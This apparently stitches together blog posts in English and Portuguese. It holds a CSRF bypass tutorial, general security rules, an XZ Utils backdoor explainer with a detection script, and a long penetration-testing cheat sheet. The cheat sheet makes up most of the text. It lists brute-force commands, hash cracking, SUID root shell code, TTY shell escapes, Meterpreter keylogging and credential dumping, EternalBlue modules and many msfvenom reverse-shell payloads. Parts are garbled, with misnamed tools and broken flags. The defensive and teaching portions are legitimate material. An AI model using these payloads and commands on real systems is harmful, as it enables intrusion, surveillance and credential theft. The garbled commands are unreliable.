CSRF stands for Cross site request forgery where an attacker trick an victim to click on malicious link and to do intended action like changing password, email, purchasing product etc.
CSRF is easy to exploit you can use burpsuite pro to generate CSRF POC otherwise do things showing below.

save to POC and then exploit by clicking on it.

There are three type of defences against CSRF

• CSRF
• Same-site cookie
• Referrer based

Note: There is bypasses for each weak security

CSRF Token bypass:

• [ ] Token validation depend on method
• [ ] Token being present
• [ ] Token is not tied to session (Try account A token in account B)
• [ ] CSRF token tied to non-session cookie
• [ ] CSRF token is duplicated and does not handle or store token at the server.

Same-site cookie restriction

Site = scheme + 1 + tld

Origin = is full url

example:

https://sub.domain.com:433

Here https, domain.com and 443 is site

and Origin is full url = https://sub.domain.com:433

How does samesite cookie work?

Ans: same site cookie work by limiting the browser from making cross site request, before same site cookie was originated browser does not check where the request is originated from the same domain or not

There are three level in same-site cookie:

1. Strict Same-Site: Strict
2. Lax Same-Site: Lax (Chrome browser by defult apply this security)
3. None Same-site: None

In Strict level website fully restrict from making cross-site request if the host name does not match with name in the bar then request will not get completed

In Lax there is two condition to match to make cross-site request.

• Request uses GET method
• Request resulted from a top-level navigation by the user

In None Same-site restriction is NONE

to solve the labs use script tag and force the user to go to vulnerable link using document.location below is example how you can do it

If Same-Site restriction is set to Strict then first we need to find client site redirect and if the client side redirect is happening then only we can exploit this scenario

same-site cookie bypass with cookie refresh

Bypassing Referrer based defence

#1 Token validation depend referrer header being present
We can remove referrer header from the request using below meta tag:
<meta name=”referrer” content=”never”> // try with both referer and referrer

#2 Validation of referer can be circumvented or CSRF with broken Referer validation
some application validate referer header in a naive way, they validate the certain keywords in the referer header value like domain name
so in this case attacker can host application domain as subdomain and then launch CSRF attack.
Example:
http://vulnerable-website.com.attacker-website.com/csrf-attack
http://attacker-website.com/csrf-attack?vulnerable-website.com
etc. play with referer header and see how application is validating referer header

• [ ] Lax bypass via override method (found _method parameter) (Changing the request method with overriding the method
• [ ] Strict bypass via client-side redirect
• [ ] SameSite lax bypass via cookie refresh (SSO)

CSRF In JSON body —

To send JSON request in the body of request we can enter the data in name of the tag and value. below is the one of the example of that

CSRF POC code would be like below

https://beacons.ai/morganbinbash

Os 10 Mandamentos da Cibersegurança:

1- Mantenha seu software atualizado:
Instale atualizações de segurança e patches regularmente para proteger seu sistema contra vulnerabilidades conhecidas.

2- Use senhas fortes e exclusivas:
Crie senhas complexas e diferentes para cada conta, e considere o uso de um gerenciador de senhas para ajudar a mantê-las seguras.

3- Ative a autenticação de dois fatores (2FA):
Adicione uma camada extra de segurança às suas contas online exigindo um segundo método de verificação além da senha.

4- Proteja-se contra malware:
Utilize software antivírus/anti-malware atualizado e evite clicar em links ou baixar anexos de fontes não confiáveis.

5- Faça backup regularmente:
Mantenha cópias de segurança dos seus dados importantes em locais seguros e isolados para protegê-los contra perda devido a ataques ou falhas de hardware.

6- Seja cuidadoso com emails e mensagens:
Desconfie de mensagens não solicitadas, especialmente aquelas com links ou anexos, e verifique sempre a autenticidade antes de clicar ou responder.

7- Proteja sua rede:
Utilize firewalls, criptografia e outras medidas de segurança para proteger sua rede doméstica ou empresarial contra acessos não autorizados.

8- Esteja ciente de ameaças de engenharia social:
Esteja atento a tentativas de manipulação por parte de cibercriminosos para obter informações confidenciais ou acesso não autorizado.

9- Eduque-se e eduque outros:
Mantenha-se informado sobre as últimas tendências e ameaças em cibersegurança, e compartilhe boas práticas com colegas, amigos e familiares.

10- Tenha um plano de resposta a incidentes:
Esteja preparado para agir rapidamente em caso de violação de segurança, com um plano claro de como responder, mitigar danos e recuperar-se.

Os pilares da cybersegurança:

Os pilares da cibersegurança podem variar um pouco dependendo da fonte, mas geralmente incluem os seguintes aspectos fundamentais:

1- Confidencialidade:
Garantir que as informações e dados sensíveis sejam acessíveis apenas por pessoas autorizadas.

2- Integridade:
Manter a precisão e a confiabilidade dos dados, garantindo que não sejam alterados ou corrompidos por fontes não autorizadas.

3- Disponibilidade:
Assegurar que os sistemas e dados estejam disponíveis quando necessários, evitando interrupções e garantindo a continuidade dos serviços.

4- Autenticidade:
Verificar a identidade das partes envolvidas em transações e comunicações, garantindo que sejam quem afirmam ser.

5- Não repúdio:
Garantir que as partes envolvidas em uma transação não possam negar sua participação ou as ações realizadas.

6- Controle de acesso:
Limitar o acesso a recursos e informações apenas a usuários autorizados, com base em suas funções e necessidades.

7- Auditoria e monitoramento:
Registrar e analisar atividades de sistema e rede para identificar possíveis violações de segurança e comportamentos anômalos.

8- Resiliência:
Capacidade de resistir e se recuperar rapidamente de incidentes de segurança, minimizando impactos e garantindo a continuidade das operações.

Esses pilares formam a base para o desenvolvimento de estratégias e medidas de segurança cibernética eficazes em proteger sistemas, redes e dados contra ameaças e ataques.

morganbinbash | Ayo

NVD

O risco.

Essa ameaça é perigosa devido à capacidade da backdoor de permitir que os atacantes executem código malicioso remotamente, sem deixar rastros nos logs do sshd.

Quais distribuições podem conter utilitários maliciosos e quais estão seguras?

Sabe-se que as versões 5.6.0 e 5.6.1 do XZ Utils foram incluídas nas compilações de março das seguintes distribuições Linux.

**Kali Linux, mas, de acordo com o [blog oficial](https://www.kali.org/blog/about-the-xz-backdoor/), apenas aquelas disponíveis entre 26 e 29 de março (o blog também contém instruções para verificar versões com componentes vulneráveis)**

**openSUSE Tumbleweed e openSUSE MicroOS, [disponíveis de 7 a 28 de março](https://news.opensuse.org/2024/03/29/xz-backdoor/)**

**Fedora 41, Fedora Rawhide e Fedora Linux 40 beta**

**Debian (somente nas [distribuições *testing, unstable e experimental*](https://lists.debian.org/debian-security-announce/2024/msg00057.html))**

• *Arch Linux — imagens de contêiner disponíveis de 29 de fevereiro a 29 de março. No entanto, o site [org](http://archlinux.org/) afirma que, devido às peculiaridades de implementação, este vetor de ataque não funcionará no Arch Linux, apesar de recomendarem fortemente a atualização do sistema.**

De acordo com informações oficiais divulgadas pelas próprias empresas

Red Hat Enterprise Linux (RHEL), SUSE Linux Enterprise, openSUSE Leap e Debian Stable não são vulneráveis.

Quanto a outras distribuições, é aconselhável verificar manualmente a presença de versões com trojans do XZ Utils.

Como o código malicioso foi implantado

Aparentemente, foi um caso tipico de cessão de controle.

A pessoa que inicialmente mantinha o projeto XZ Libs no GitHub transferiu o repositório para uma conta que tem contribuído para vários repositórios relacionados à compressão de dados há vários anos.

E, em algum momento, alguém por trás daquela outra conta implantou uma backdoor no código do projeto.

Critical XZ Utils Supply Chain Compromise Affects Multiple Linux Distributions (CVE-2024-3094)

Confirme se o liblzma está comprometido.

Primeiro, podemos detectar se a versão do liblzma contém o backdoor, graças a um script de Vegard Nossum.

(o script — detect.sh)

#! /bin/bash

set -eu

# find path to liblzma used by sshd
path=”$(ldd $(which sshd) | grep liblzma | grep -o ‘/[^ ]*’)”

# does it even exist?
if [ “$path” == “” ]
then
echo probably not vulnerable
exit
fi

# check for function signature
if hexdump -ve ‘1/1 “%.2x”’ “$path” | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410
then
echo probably vulnerable
else
echo probably not vulnerable
fi
EOF

Como executar esse script bash:

$ chmod +x detect.sh

$ ./detect.sh

Confirme se o daemon SSH está mais lento que o normal.

sudo sed -E -i ‘s/^#?PasswordAuthentication .*/PasswordAuthentication no/’ /etc/ssh/sshd_config

Em seguida, reinicie o daemon.

sudo systemctl restart ssh

time ssh nonexistant@localhost

não há “valor certo” aqui, pois é altamente dependente de sua configuração específica. Porém, o que queremos é ter uma ideia de quanto tempo leva, então vamos executar o comando algumas vezes, para ter certeza de que os resultados são consistentes. Nos meus testes, os resultados são realmente muito consistentes, consigo 5,63 s reais quase o tempo todo.

Agora vamos reinstalar a versão sem backdoor do liblzma.

sudo apt update && sudo apt install — yes liblzma5

time ssh nonexistant@localhost

Como podemos ver, a diferença de tempo é bastante clara, é muito mais rápido sem o backdoor!

Créditos:

• oss-security - backdoor in upstream xz/liblzma leading to ssh server compromise
• xz-utils backdoor: how to get started | Kali Linux Blog

https://beacons.ai/morganbinbash

𝘐𝘧 𝘺𝘰𝘶 𝘢𝘳𝘦 𝘢𝘭𝘳𝘦𝘢𝘥𝘺 𝘪𝘮𝘱𝘳𝘦𝘴𝘴𝘦𝘥 𝘣𝘺 𝘵𝘩𝘦 𝘢𝘳𝘵𝘪𝘤𝘭𝘦, 𝘺𝘰𝘶 𝘢𝘳𝘦 𝘪𝘯𝘷𝘪𝘵𝘦𝘥 𝘵𝘰 𝘤𝘰𝘯𝘵𝘪𝘯𝘶𝘦 𝘪𝘮𝘱𝘳𝘰𝘷𝘪𝘯𝘨 𝘺𝘰𝘶𝘳 𝘬𝘯𝘰𝘸𝘭𝘦𝘥𝘨𝘦. 𝘛𝘩𝘪𝘴 𝘤𝘰𝘮𝘱𝘳𝘦𝘩𝘦𝘯𝘴𝘪𝘷𝘦 𝘨𝘶𝘪𝘥𝘦 𝘸𝘪𝘭𝘭 𝘩𝘦𝘭𝘱 𝘺𝘰𝘶 𝘨𝘢𝘪𝘯 𝘢𝘯 𝘪𝘯-𝘥𝘦𝘱𝘵𝘩 𝘶𝘯𝘥𝘦𝘳𝘴𝘵𝘢𝘯𝘥𝘪𝘯𝘨 𝘰𝘧 𝘱𝘦𝘯𝘦𝘵𝘳𝘢𝘵𝘪𝘰𝘯 𝘵𝘦𝘴𝘵𝘪𝘯𝘨 𝘢𝘯𝘥 𝘪𝘴 𝘺𝘰𝘶𝘳 𝘧𝘪𝘳𝘴𝘵 𝘢𝘯𝘥 𝘣𝘦𝘴𝘵 𝘤𝘩𝘰𝘪𝘤𝘦 𝘵𝘰 𝘲𝘶𝘪𝘤𝘬𝘭𝘺 𝘭𝘦𝘢𝘳𝘯, 𝘳𝘦𝘧𝘦𝘳𝘦𝘯𝘤𝘦, 𝘢𝘯𝘥 𝘧𝘢𝘮𝘪𝘭𝘪𝘢𝘳𝘪𝘻𝘦 𝘺𝘰𝘶𝘳𝘴𝘦𝘭𝘧 𝘸𝘪𝘵𝘩 𝘤𝘰𝘮𝘮𝘢𝘯𝘥𝘴 𝘢𝘯𝘥 𝘵𝘦𝘤𝘩𝘯𝘪𝘲𝘶𝘦𝘴 𝘪𝘯 𝘵𝘩𝘪𝘴 𝘤𝘳𝘶𝘤𝘪𝘢𝘭 𝘢𝘳𝘦𝘢 𝘰𝘧 ​​𝘤𝘺𝘣𝘦𝘳𝘴𝘦𝘤𝘶𝘳𝘪𝘵𝘺. 𝘞𝘩𝘦𝘵𝘩𝘦𝘳 𝘺𝘰𝘶’𝘳𝘦 𝘢 𝘱𝘦𝘯𝘦𝘵𝘳𝘢𝘵𝘪𝘰𝘯 𝘵𝘦𝘴𝘵𝘪𝘯𝘨 𝘣𝘦𝘨𝘪𝘯𝘯𝘦𝘳 𝘰𝘳 𝘢𝘯 𝘦𝘹𝘱𝘦𝘳𝘵, 𝘵𝘩𝘪𝘴 𝘳𝘦𝘴𝘰𝘶𝘳𝘤𝘦 𝘤𝘰𝘯𝘵𝘢𝘪𝘯𝘴 𝘦𝘷𝘦𝘳𝘺𝘵𝘩𝘪𝘯𝘨 𝘺𝘰𝘶 𝘯𝘦𝘦𝘥 𝘵𝘰 𝘯𝘢𝘷𝘪𝘨𝘢𝘵𝘦 𝘵𝘩𝘦 𝘸𝘰𝘳𝘭𝘥 𝘰𝘧 𝘴𝘦𝘤𝘶𝘳𝘪𝘵𝘺 𝘢𝘴𝘴𝘦𝘴𝘴𝘮𝘦𝘯𝘵𝘴. 𝘌𝘹𝘱𝘭𝘰𝘳𝘦 𝘵𝘰𝘰𝘭𝘴, 𝘮𝘦𝘵𝘩𝘰𝘥𝘴, 𝘢𝘯𝘥 𝘪𝘯𝘴𝘪𝘨𝘩𝘵𝘴 𝘧𝘰𝘳 𝘦𝘧𝘧𝘦𝘤𝘵𝘪𝘷𝘦 𝘳𝘦𝘤𝘰𝘯𝘯𝘢𝘪𝘴𝘴𝘢𝘯𝘤𝘦, 𝘦𝘯𝘶𝘮𝘦𝘳𝘢𝘵𝘪𝘰𝘯, 𝘱𝘳𝘪𝘷𝘪𝘭𝘦𝘨𝘦 𝘦𝘴𝘤𝘢𝘭𝘢𝘵𝘪𝘰𝘯, 𝘱𝘢𝘴𝘴𝘸𝘰𝘳𝘥 𝘤𝘳𝘢𝘤𝘬𝘪𝘯𝘨, 𝘦𝘹𝘱𝘭𝘰𝘪𝘵 𝘳𝘦𝘴𝘦𝘢𝘳𝘤𝘩, 𝘢𝘯𝘥 𝘮𝘰𝘳𝘦. 𝘌𝘯𝘩𝘢𝘯𝘤𝘦 𝘺𝘰𝘶𝘳 𝘱𝘦𝘯𝘦𝘵𝘳𝘢𝘵𝘪𝘰𝘯 𝘵𝘦𝘴𝘵𝘪𝘯𝘨 𝘴𝘬𝘪𝘭𝘭𝘴 𝘸𝘪𝘵𝘩 𝘵𝘩𝘪𝘴 𝘷𝘢𝘭𝘶𝘢𝘣𝘭𝘦 𝘳𝘦𝘴𝘰𝘶𝘳𝘤𝘦!

ℜ𝔢𝔠𝔬𝔫𝔫𝔞𝔦𝔰𝔰𝔞𝔫𝔠𝔢 𝔞𝔫𝔡 𝔢𝔫𝔲𝔪𝔢𝔯𝔞𝔱𝔦𝔬𝔫

NMAP command

nmap -v -sS -A -T4 target
> Nmap detailed scans, running synchronized stealth, T4 timings, OS and service version information, traceroute and service-specific scripts.
ping sweep sudo nmap -pn target Perform a ping scan of the target network to view all available IPs.
nmap -v -sS -p–A -T4 target
> As above, but scans all TCP ports (takes longer).
nmap -v -sU -sS -p- -A -T4 target
> As above, but scans all TCP ports and UDP scans (takes longer).
nmap -v -p 445 — script=smb-check-vulns — script-args=unsafe=1 192.168.1.X
> Nmap script for scanning vulnerable SMB servers.
nmap localhost Displays all ports currently in use.
ls /usr/share/nmap/scripts/* | grep ftp
> Search for keywords in nmap script.

Alternative host discovery methods that do not use Nmap.
netdiscover -r 192.168.1.0/24
> Discover IPs, MAC addresses, and MAC providers on the subnet from ARP.
arp-scan — interface=eth0 192.168.1.0/24
> ARP scan to discover hosts on the local network.
fping -g 192.168.1.0/24
> Send ICMP echo requests to multiple hosts to check if they are active.
masscan -p1–65535,U:1–65535 192.168.1.0/24 — rate=1000
> Scans all ports at a high rate, useful for initial discovery.

Fast scan all ports with rustscan:

GitHub - RustScan/RustScan: 🤖 The Modern Port Scanner 🤖

wget https://github.com/RustScan/RustScan/files/9473239/rustscan_2.1.0_both.zip
unzip rustscan_2.1.0_both.zip
dpkg -i rustscan_2.1.0_amd64.deb
rustscan — ulimit=5000 — range=1–65535 -a <host> — -A -sC

SMB enumeration

In computer networks, Server Message Block (SMB) operates as an application layer network protocol and is primarily used to provide shared access to files, printers, and serial ports.
nbtscan 192.168.1.0/24
> Discover Windows/Samba servers on a subnet, find Windows MAC addresses, netbios names and discover client workgroups/domains.
enum4linux -a target-ip
> Do everything, run all options except dictionary-based share name guessing (find Windows client domains/workgroups).
smbclient -L target-ip
> Lists all SMB shares available on the target computer.
smbget -R smb://target-ip/share
> Recursively download files from an SMB share.
rpcclient -U “” target-ip
> Use an empty username to connect to the SMB server and list the available commands.
showmount -e target-ip
> Displays the available shares on the target computer, useful for NFS.
smbmap -H target-ip
> Displays the target’s sharing permissions.
smbstatus
> Lists current Samba connections. Useful when running on the target machine.
Other host discovery methods

𝔗𝔬𝔬𝔩 𝔥𝔦𝔫𝔱

• GitHub - Pennyw0rth/NetExec: The Network Execution Tool
• Welcome | NetExec

Python local webserver

Python local web server commands to facilitate shell and vulnerability exploitation on attack machines.
python -m SimpleHTTPServer 80
> Runs a basic HTTP server, perfect for providing a shell etc.
python3 -m http.server 80
> Use Python 3 to run a basic HTTP server.
python -m SimpleHTTPServer 80 — bind 192.168.1.2
> Bind the server to a specific IP address.

Mount file share

How to mount NFS/CIFS, Windows and Linux file shares.
mount 192.168.1.1:/vol/share /mnt/nfs
> Mount the NFS share to. /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
> Install Windows CIFS/SMB shares on Linux. /mnt/cifs
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
> Mount a Windows share on Windows from the command line.
apt-get install smb4k -y
> Install smb4k on Kali, a useful Linux GUI for browsing SMB shares.
smbclient -L //192.168.1.X -U username
> Lists SMB shares available on Windows computers.

Basic fingerprint

Device fingerprinting or machine fingerprinting or browser fingerprinting is information collected about a remote computing device for identification purposes.
nc -v 192.168.1.1 25
> Basic version control/fingerprinting via displayed banner.
telnet 192.168.1.1 25
> Another approach to basic version control/fingerprinting.
curl -I 192.168.1.1
> Gets the HTTP headers used to fingerprint the web server.
nmap -O 192.168.1.1
> Use Nmap to perform operating system detection.
whatweb 192.168.1.1
> Determine the web technologies used on the target.

SNMP enumeration

SNMP enumeration is the process of enumerating user accounts on a target system using SNMP.
snmpcheck -t 192.168.1.X -c public
> SNMP enumeration
snmpwalk -c public -v1 192.168.1.X 1
> SNMP enumeration
snmpenum -t 192.168.1.X SNMP
> enumeration
onesixtyone -c names -i hosts
> SNMP enumeration
snmpbulkwalk -v2c -c public -Cn0 -Cr10 192.168.1.X
> Bulk SNMP enumeration

DNS zone transfer

nslookup -> set type=any -> ls -d blah.com
> Windows DNS zone transfer
dig axfr blah.com@ _
> Linux DNS zone transfer
host -l blah.com _
> Another Linux DNS zone transfer method

DNSRecon

DNSRecon provides the ability to perform various DNS enumeration tasks.
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std — xml ouput.xml

HTTP/HTTPS Webserver Enumeration

nikto -h 192.168.1.1
> Perform a nikto scan on the target
dirbuster
Configuring via GUI, CLI input doesn’t work most of the time
gobuster dir -u 192.168.1.1-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
> Directory brute force and saboteurs
wpscan — url 192.168.1.1
> WordPress Vulnerability Scanner
joomscan -u 192.168.1.1
> Jomla Vulnerability Scanner
uniscan -u 192.168.1.1-qweds
> Uniscan automated vulnerability scanner
curl -I 192.168.1.1
> Using curl to get HTTP headers
nmap -p80 — script http-enum 192.168.1.1
> Nmap script for HTTP enumeration
whatweb 192.168.1.1
> Identify the technologies used on the website
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt — hc 404 192.168.1.1/FUZZ
> Fuzzing HTTP with wfuzz

Packet inspection

tcpdump tcp port 80 -w output.pcap -i eth0
> Capture packets on port 80
‘tcpdump -i eth0 ‘port 443 and (tcp-syn tcp-ack)! =0’’
wireshark -k -i <interface>
> Open Wireshark on a specific interface
tshark -i eth0 -f “tcp port 80”
> Use tshark to capture packets on port 80

Username enumeration

SMB user enumeration
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
> Enumerate users from SMB
ridenum.py 192.168.XXX.XXX500 50000 dict.txt
> RID period SMB/enumerate users from SMB
enum4linux -U 192.168.XXX.XXX
> Enumerate SMB usernames using enum4linux

SNMP user enumeration

snmpwalk public -v1 192.168.X.XXX1
> Grepp77.1.2.25
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX
> Enumerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254-oG snmp_results.txt
> Search for SNMP servers with nmap, grepable output

ℌ𝔞𝔰𝔥𝔢𝔰 & 𝔭𝔞𝔰𝔰𝔴𝔡

MD5 x SHA-1 x SHA-2 - Qual é o hash de criptografia mais seguro e como verificá-lo

Password

word list
Order describe
/usr/share/wordlists
> Kali word list
wget 1000000.txt
> Download the hot word list from GitHub

Brute force cracking service

Hydra
FTP brute force cracking
Order describe
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXXftp -V
> Hydra FTP Brute Force
POP3 Brute Force
Order describe
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXXpop3 -V
> Hydra POP3 Brute Force
hydra -L <username_list_file.ext> -P <password_list_file.ext> <ip_host> <service> -V
> Dictionary Attack: If you have lists of usernames and passwords, you can use Hydra to perform a dictionary attack with the following command

SMTP brute force cracking

hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXXsmtp -V
> Hydra SMTP Brute Force

SSH brute force cracking

hydra -l root -P /usr/share/wordlistsnmap.lst 192.168.X.XXXssh
> Hydra SSH Brute Force
> Used to limit concurrent connections, for example:-t-t 15

John The Ripper — JTR

john –wordlist=/usr/share/wordlists/rockyou.txt hashes JTR password cracking
john –format=descrypt –wordlist /usr/share/wordlists/rockyou.txt hash.txt
> JTR forces the use of word lists for decryption cracking
john –format=descrypt hash –show
> JTR forced decryption brute force cracking
john — wordlist=/usr/share/wordlists/rockyou.txt hash.txt — format=Raw-MD5
> MD5 Crack

john — format=krb4 hashes.txt (example format kerberos)

Hashcat

hashcat -m 0 -a 0 hash.txt wordlist.txt Hashcat MD5 Crack
hashcat -m 1000 -a 0 hash.txt wordlist.txt Hashcat NTLM Crack
with Hashcat
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt — force
> Here are the hashes generated for the input strings.
MD5 hash -> 42f749ade7f9e195bf475f37a44cafcb
SHA1 hash -> b2e98ad6f6eb8508dd6a14cfa704bad7f05f6fb1

𝔈𝔵𝔭𝔩𝔬𝔦𝔱 ℜ𝔢𝔰𝔢𝔞𝔯𝔠𝔥

‘Search window 2003 grep -i local’
site: exploit-db.comexploit kernel <= 3 Google search for kernel vulnerabilities
grep -R “W7” /usr/share/metasploit-framework/modules/exploit/windows/*
> Searching for Windows 7 vulnerabilities in Metasploit modules
msfconsole -q -x “search name:windows type:exploit”
> Search Metasploit for Windows exploits

Compilation vulnerability

Determine if C code is for Windows or Linux
process.h, string.h, winbase.h, windows.h, winsock2.h window
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h Linux directory

Building an exploit for GCC

gcc -o exploit exploit.c Basic GCC compilation
gcc -Wall -Wextra exploit.c -o exploit
> Compile with all warnings and extras

GCC compilation 64-bit vulnerability on 32Bit Kali
gcc -m32 exploit.c -o exploit Cross-compiling 64-bit binaries on 32-bit Linux

Compile Windows .exe on Linux

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
> Compile Windows .exe on Linux
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
> Compile 64-bit Windows .exe on Linux

SUID C Shell for /bin/bash

int main(void){
setresuid(0, 0, 0);
system(“/bin/bash”);
}
SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system(“/bin/sh”);
}

Building SUID shell binaries

gcc -o suid suid.c
> Compile SUID shell
gcc -m32 -o suid suid.c
> Compiling a 32-bit SUID shell

TTY shell
Python TTY Shell Trick
python -c ‘import pty;pty.spawn(“/bin/bash”)’
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Generate an interactive sh shell
/bin/sh -i

Generate Perl TTY shell
perl -e ‘exec “/bin/sh”;’

Generate ruby ​​TTY shell
ruby -e ‘exec “/bin/sh”’

Generate Lure TTY Shell
lua -e ‘os.execute(“/bin/sh”)’

Generate TTY shell from Vi
:!bash

Generate TTY shell from NMAP
!sh

Generate TTY shell from awk
awk ‘BEGIN {system(“/bin/sh”)}’

Generate TTY shell from Sokat
socat file:tty,raw,echo=0 tcp-listen:4444

Metasploit

Metasploit
instrument payload
Windows reverse meter payload
set payload windows/meterpreter/reverse_tcp

Windows VNC Meterpreter payload
set payload windows/vncinject/reverse_tcp
set ViewOnly false

Linux Reverse Meterpreter payload
set payload linux/meterpreter/reverse_tcp

Android reverse meter payload
set payload android/meterpreter/reverse_tcp

Instrument Cheat Sheet
upload file c:\\windows
> Upload file to window target
download c:\\windows\\repair\\sam /tmp
> Download file from windows target
execute -fc:\\windows\temp\exploit.exe
> Run the .exe on the target
execute -f cmd -c

Create new channel using cmd shell
PS
> Show process
shell
> Get the shell on the target
getsystem
> Try elevating privileges on the target
hashdump
> Dump hash on target
portfwd add -l 3389 -p 3389 -r target
> Create a port forwarded to the target computer
portfwd delete –l 3389 –p 3389 –r target
> Remove port forwarding
screenshot
> Capture a screenshot of the target computer
keyscan_start
> Start keylogger
keyscan_dump
> Dump collected keystrokes
webcam_snap
> Take a webcam snapshot
record_mic
> Recording microphone
enum_chrome
> Enumerate Chrome browser data

Common metamodules
Remote Windows Metasploit Modules
(exploits)
use exploit/windows/smb/ms08_067_netapi
> MS08_067 Windows 2k, XP, 2003 remote exploit
use exploit/windows/dcerpc/ms06_040_netapi
> MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
> MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Attack
use exploit/windows/smb/ms17_010_eternalblue
> MS17_010 Eternal Blue SMB remote window kernel pool is damaged

Local Windows Metasploit Modules
(exploits)
use exploit/windows/local/bypassuac
> Bypass UAC + set target + architecture on Windows 7, x86/64
use exploit/windows/local/ms10_015_kitrap0d
> MS10_015 Kitrap0d local privilege escalation

Auxiliary metamodule
use auxiliary/scanner/http/dir_scanner
> Metasploit HTTP Directory Scanner
use auxiliary/scanner/http/jboss_vulnscan
> Metasploit JBOSS Vulnerability Scanner
use auxiliary/scanner/mssql/mssql_login
> Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version
> Metasploit MySQL Version Scanner
use auxiliary/scanner/oracle/oracle_login
> Metasploit Oracle Login Module

Metasploit Powershell Modules
use exploit/multi/script/web_delivery
> Metasploit Power Shell Payload Delivery Module
post/windows/manage/powershell/exec_powershell
> Upload and run Powershell scripts through sessions
use exploit/multi/http/jboss_maindeployer
> Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload
> Metasploit MSSQL payload

Post-exploit window meta-module
run post/windows/gather/win_privs
> Metasploit displays the current user’s permissions
use post/windows/gather/credentials/gpp
> Metasploit scrapes GPP saved passwords
load mimikatz -> wdigest
> Metasploit load Mimikatz
run post/windows/gather/local_admin_search_enum
> Identifies other computers to which the provided domain user has administrative access

MSFVenom Payloads

### PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php

### Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war

### Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b “\x00\x0a\x0d\x20” -e x86/shikata_ga_nai

### Linux reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o pay

>> use payload/linux/x86/shell_reverse_tcp
>> set LHOST 10.10.10.10
>> exploit

### Linux FreeBSD reverse shell
`msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf`

### Linux C reverse shell
`msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c`

### Windows non staged reverse shell
`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe`

### Windows Staged (Meterpreter) reverse shell
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe`

### Windows Python reverse shell
`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py`

### Windows ASP reverse shell
`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp`

### Windows ASPX reverse shell
`msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx`

### Windows JavaScript reverse shell with nops
`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18`

### Windows Powershell reverse shell
`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1`

### Windows reverse shell excluding bad characters
`msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b “\x00\x04” -e x86/shikata_ga_nai`

### Windows x64 bit reverse shell
`msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe`

### Windows reverse shell embedded into plink
`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe`

Networking

TTL fingerprint recognition
Operating system TTL size
window 128
Linux directory 64
Solaris 255
Cisco/Network 255

Cisco IOS commands

conf t Abbreviation, configuration terminal
(config)# interface fa0/0 Configure Fast Ethernet 0/0
(config-if)#ip addr 0.0.0.0 255.255.255.255 Add IP to fa0/0
(config-if)# line vty 0 4 Configure vty lines
(config-line)# login Cisco sets remote login password
(config-line)# password YOUR-PASSWORD Set remote login password
# show running-config Displays the running configuration loaded in memory
# show startup-config Show startup configuration
# show version Show Cisco IOS version
# show session Show open sessions
#showipinterface show network interface
# show interface e0 Show detailed interface information
#showiproute show route
# show access-lists Show access list
# dir file systems Show available files
# dir all-filesystems File information
# dir /all Show deleted files
# terminal length 0 Unlimited terminal output
# copy running-config tftp Copy the running configuration to the tftp server
# copy running-config startup-config Copy startup configuration to running configuration

Cryptography

Hash length
MD5 16 bytes
SHA-1 20 bytes
SHA-256 32 bytes
SHA-512 64 byte

Hash example
MD5 hash example 8743b52063cd84097a65d1633f5c74f5
SHA1 hash example B89EAAC7E61417341b710b727768294d0e6a277b
